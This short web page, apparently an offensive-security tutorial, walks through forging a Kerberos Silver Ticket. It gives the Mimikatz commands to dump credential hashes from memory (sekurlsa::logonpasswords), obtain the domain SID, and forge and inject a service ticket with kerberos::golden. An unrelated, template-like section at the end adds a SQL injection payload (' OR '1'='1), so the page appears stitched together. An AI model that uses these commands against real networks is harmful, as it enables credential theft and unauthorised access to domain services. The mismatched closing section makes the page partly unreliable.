Skip to main content

Silver Ticket


About The Attack

A Silver Ticket is a forged Kerberos service ticket (TGS) for a specific service.

  • Unlike a Golden Ticket (which forges TGTs and gives domain-wide access), a Silver Ticket only works for one service on one machine.
  • But it’s much stealthier because it doesn’t involve the Domain Controller (DC) at all. Once you forge the ticket, authentication happens directly between you and the target service.

Pre Requsites

We need below information to perform the attack

  • SPN password hash
  • Domain SID
  • Target SPN
  • Privileged access to a domain machine

How to perform the attack

Extract Hash

we need hash of the SPN that we want to create Silver Ticket For

privilege::debug
sekurlsa::logonpasswords

From the above command we can select the service

Fetch SID

We need the Domain SID for silver ticket, We will ignore RID of the user from the command Result

whoami /user

Use Mimikatz

now use mimikatz to forge a silver ticket for the service, in below command we have considered a webservice.

kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:domain.com /ptt /target:web.domain.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:UserName

Verify Ticket

We can use powershell to validate if the ticket has been added in the list

klist

🚀 Launch Sequence (How-To)

Here’s how the magic happens — step by step.

# Example flow:
1. Identify the injection point
2. Craft payload: ' OR '1'='1
3. Send request and observe results